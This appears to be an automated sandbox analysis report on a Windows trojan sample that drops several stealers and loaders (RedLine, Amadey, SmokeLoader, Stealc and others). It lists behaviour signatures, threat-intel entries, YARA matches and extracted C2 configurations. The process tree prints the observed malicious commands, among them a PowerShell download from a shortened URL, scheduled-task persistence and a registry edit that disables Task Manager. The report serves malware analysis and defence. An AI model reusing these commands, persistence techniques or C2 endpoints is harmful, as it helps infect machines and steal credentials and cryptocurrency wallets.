Edit tour

Windows Analysis Report
1Vkf7silOj.exe

Overview

General Information

Sample name:	1Vkf7silOj.exe renamed because original name is a hash value
Original sample name:	cd581d68ed550455444ee6e099c44266.exe
Analysis ID:	1463420
MD5:	cd581d68ed550455444ee6e099c44266
SHA1:	f131d587578336651fd3e325b82b6c185a4b6429
SHA256:	a2ebb4bbf2ae4f7755b3ab604996e6c7e570ac8837ca544854ed696a81972505
Tags:	32exetrojan
Infos:

Detection

LummaC, Amadey, Mars Stealer, PureLog Stealer, RedLine, SmokeLoader, Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Powershell downloading file from url shortener site

Snort IDS alert for network traffic

Yara detected Amadey

Yara detected Amadeys stealer DLL

Yara detected Mars stealer

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected SmokeLoader

Yara detected Stealc

Yara detected Vidar stealer

Yara detected Xmrig cryptocurrency miner

Yara detected zgRAT

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Detected Stratum mining protocol

Disable Task Manager(disabletaskmgr)

Disables the Windows task manager (taskmgr)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

PE file contains section with special chars

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Suspicious Script Execution From Temp Folder

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to resolve many domain names, but no domain seems valid

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses known network protocols on non-standard ports

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Enables security privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Modifies existing windows services

One or more processes crash

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Communication To Uncommon Destination Ports

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: PowerShell Web Download

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: Use Short Name Path in Command Line

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

1Vkf7silOj.exe (PID: 6620 cmdline: "C:\Users\user\Desktop\1Vkf7silOj.exe" MD5: CD581D68ED550455444EE6E099C44266)

chrome.exe (PID: 1848 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.co/1lLub MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 5804 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1880,i,1559005208409857201,3821663929955985099,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

6.exe (PID: 7776 cmdline: "C:\Users\user~1\AppData\Local\Temp\6.exe" MD5: 5BB3677A298D7977D73C2D47B805B9C3)

7.exe (PID: 7884 cmdline: "C:\Users\user~1\AppData\Local\Temp\7.exe" MD5: B60D82B8244E964110F66E7AD34DC37B)

axplong.exe (PID: 8088 cmdline: "C:\Users\user~1\AppData\Local\Temp\8254624243\axplong.exe" MD5: B60D82B8244E964110F66E7AD34DC37B)

svchost.exe (PID: 1460 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 2508 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

axplong.exe (PID: 8080 cmdline: C:\Users\user~1\AppData\Local\Temp\8254624243\axplong.exe MD5: B60D82B8244E964110F66E7AD34DC37B)

gold.exe (PID: 7752 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000035001\gold.exe" MD5: 92C01627961859A84FFA633327C5D7F9)

RegAsm.exe (PID: 7772 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WerFault.exe (PID: 5820 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7752 -s 320 MD5: C31336C1EFC2CCB44B4326EA793040F2)

NewLatest.exe (PID: 6668 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000064001\NewLatest.exe" MD5: 07101CAC5B9477BA636CD8CA7B9932CB)

Hkbsse.exe (PID: 5404 cmdline: "C:\Users\user~1\AppData\Local\Temp\b66a8ae076\Hkbsse.exe" MD5: 07101CAC5B9477BA636CD8CA7B9932CB)

1.exe (PID: 8424 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000020001\1.exe" MD5: E1B59D2805B38262B9967BCE3E719DBF)

Installer.exe (PID: 7900 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000091001\Installer.exe" MD5: 5F331887BEC34F51CCA7EA78815621F7)

cmd.exe (PID: 7920 cmdline: cmd /c ins.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7972 cmdline: schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7988 cmdline: schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

powershell.exe (PID: 7888 cmdline: powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 8432 cmdline: powershell -Command "Start-Process 'C:\Users\user~1\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden" MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 8804 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user~1\AppData\Local\Temp\install.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 9128 cmdline: schtasks /create /tn "Cleaner" /tr "C:\Users\user\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00 MD5: 76CD6626DD8834BD4A42E6A565104DC2)

reg.exe (PID: 9176 cmdline: reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001 MD5: 227F63E1D9008B36BDBCC4B397780BE4)

ldr.exe (PID: 8260 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000108001\ldr.exe" MD5: C4AEAAFC0507785736E000FF7E823F5E)

Hkbsse.exe (PID: 8460 cmdline: "C:\Users\user~1\AppData\Local\Temp\28feeece5c\Hkbsse.exe" MD5: C4AEAAFC0507785736E000FF7E823F5E)

alex5555555.exe (PID: 8560 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000109001\alex5555555.exe" MD5: A80A86C701801CBD77CF7406BE6D11F0)

RegAsm.exe (PID: 8588 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

svhosts.exe (PID: 8744 cmdline: "C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe" MD5: 8A70C2805C58FCCA31037C6DD59E5833)

Explorers.exe (PID: 8752 cmdline: "C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe" MD5: 894C2E356E72DA7A60C2978A258B2081)

conhost.exe (PID: 8820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WerFault.exe (PID: 8676 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8560 -s 284 MD5: C31336C1EFC2CCB44B4326EA793040F2)

123.exe (PID: 8716 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000110001\123.exe" MD5: CD581D68ED550455444EE6E099C44266)

O3B6wY7ZkFhh.exe (PID: 9088 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000111001\O3B6wY7ZkFhh.exe" MD5: 9B297A1485665AEF1A926F7CD322C932)

TpWWMUpe0LEV.exe (PID: 9188 cmdline: "C:\Users\user~1\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe" MD5: 242214131486132E33CEDA794D66CA1F)

conhost.exe (PID: 9208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

aspnet_regiis.exe (PID: 8196 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)

svchost.exe (PID: 7832 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 5208 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 7752 -ip 7752 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 8608 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 212 -p 8560 -ip 8560 MD5: C31336C1EFC2CCB44B4326EA793040F2)

svchost.exe (PID: 2276 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

Hkbsse.exe (PID: 5376 cmdline: C:\Users\user~1\AppData\Local\Temp\b66a8ae076\Hkbsse.exe MD5: 07101CAC5B9477BA636CD8CA7B9932CB)

svchost.exe (PID: 7320 cmdline: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

chrome.exe (PID: 7356 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" http://starjod.xyz/Website.php MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 7292 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1992,i,12647430490960773708,190328804482566679,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 5760 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" http://starjod.xyz/Website.php MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 6016 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1480 --field-trial-handle=1844,i,568275399353426171,11183762438970494550,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

rundll32.exe (PID: 8968 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\" MD5: EF3179D498793BF4234F708D3BE28633)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://darktrace.com/blog/the-rise-of-the-lumma-info-stealer https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-lummac2-94111d4b1e11	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "65.21.175.0/108e010e8f91c38c.php"}

Threatname: Vidar

{"C2 url": "http://65.21.175.0/108e010e8f91c38c.php"}

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://movlat.com/tmp/", "http://llcbc.org/tmp/", "http://lindex24.ru/tmp/", "http://qeqei.xyz/tmp/"]}

Threatname: Amadey

{"C2 url": "o7labs.top/online/support/index.php", "Version": "4.31"}

Threatname: RedLine

{"C2 url": ["185.215.113.67:40960"], "Bot Id": "123", "Authorization Header": "d6fe06e6d618e4a9e38420480ea2db60"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
1Vkf7silOj.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\configurationValue\svhosts.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\1000108001\ldr.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Temp\28feeece5c\Hkbsse.exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\ldr[1].exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Roaming\configurationValue\Explorers.exe	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x457bf:$s1: file:/// 0x4571b:$s2: {11111-22222-10009-11112} 0x4574f:$s3: {11111-22222-50001-00000} 0x426c9:$s4: get_Module 0x3ced3:$s5: Reverse 0x3db7b:$s6: BlockCopy 0x3ce3e:$s7: ReadByte 0x457d1:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
C:\Users\user\AppData\Local\Temp\1000110001\123.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\NewLatest[1].exe	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\123[1].exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Click to see the 7 entries

Memory Dumps

Source	Rule	Description	Author	Strings
0000002A.00000000.1831961958.0000000000232000.00000002.00000001.01000000.0000001B.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000025.00000002.3823740608.0000000003E25000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000025.00000002.3823740608.0000000003E25000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000023.00000000.1777423527.00000000006D1000.00000020.00000001.01000000.00000018.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000024.00000002.1961435191.000000000099D000.00000004.00000001.01000000.00000019.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000024.00000002.1961435191.000000000099D000.00000004.00000001.01000000.00000019.sdmp	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x964ad:$a1: get_encrypted_key 0x95baf:$a2: get_PassedPaths 0x945d0:$a3: ChromeGetLocalName 0x95db0:$a4: GetBrowsers 0x9c7da:$a5: Software\Valve\SteamLogin Data 0x9c07a:$a6: %appdata%\ 0x958d4:$a7: ScanPasswords
00000036.00000002.2125675597.0000000003017000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000009.00000003.1584978674.0000000005410000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000013.00000002.3789339584.0000000000081000.00000020.00000001.01000000.00000014.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000014.00000002.1735836274.0000000000081000.00000020.00000001.01000000.00000014.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000034.00000002.1966115508.000000006B6EE000.00000004.00000001.01000000.00000020.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000034.00000002.1966115508.000000006B6EE000.00000004.00000001.01000000.00000020.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000012.00000002.1715766877.00000000005F1000.00000020.00000001.01000000.00000012.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000024.00000002.1961435191.00000000008AF000.00000004.00000001.01000000.00000019.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000024.00000002.1961435191.00000000008AF000.00000004.00000001.01000000.00000019.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000036.00000002.2124198557.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000036.00000002.2124198557.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_MarsStealer	Yara detected Mars stealer	Joe Security
00000020.00000002.1785237216.0000000000D51000.00000020.00000001.01000000.00000016.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000023.00000002.1794779691.00000000006D1000.00000020.00000001.01000000.00000018.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000021.00000002.2010009861.00000000025BE000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x355c:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000C.00000002.1936969540.000000000017F000.00000004.00000001.01000000.00000010.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000A.00000002.3789339171.00000000006B1000.00000040.00000001.01000000.0000000E.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000009.00000002.1627435742.0000000000C51000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000B.00000002.1678495437.00000000006B1000.00000040.00000001.01000000.0000000E.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000021.00000002.2005785440.00000000023E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000021.00000002.2005785440.00000000023E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x604:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000029.00000000.1843357617.0000000000891000.00000002.00000001.01000000.0000001C.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000001.00000000.1308164877.0000000000932000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000025.00000002.3789215805.00000000004F0000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000025.00000002.3789215805.00000000004F0000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_3d9371fd	unknown	unknown	0x96285:$a1: get_encrypted_key 0x95987:$a2: get_PassedPaths 0x943a8:$a3: ChromeGetLocalName 0x95b88:$a4: GetBrowsers 0x9c5b2:$a5: Software\Valve\SteamLogin Data 0x9be52:$a6: %appdata%\ 0x956ac:$a7: ScanPasswords
00000014.00000000.1725227418.0000000000081000.00000020.00000001.01000000.00000014.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000021.00000002.2005592482.00000000023D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000000B.00000003.1635383014.0000000004FB0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000012.00000000.1698297314.00000000005F1000.00000020.00000001.01000000.00000012.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000025.00000002.3789215805.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000025.00000002.3789215805.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000020.00000000.1756819585.0000000000D51000.00000020.00000001.01000000.00000016.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0000000A.00000003.1635196355.0000000004E90000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
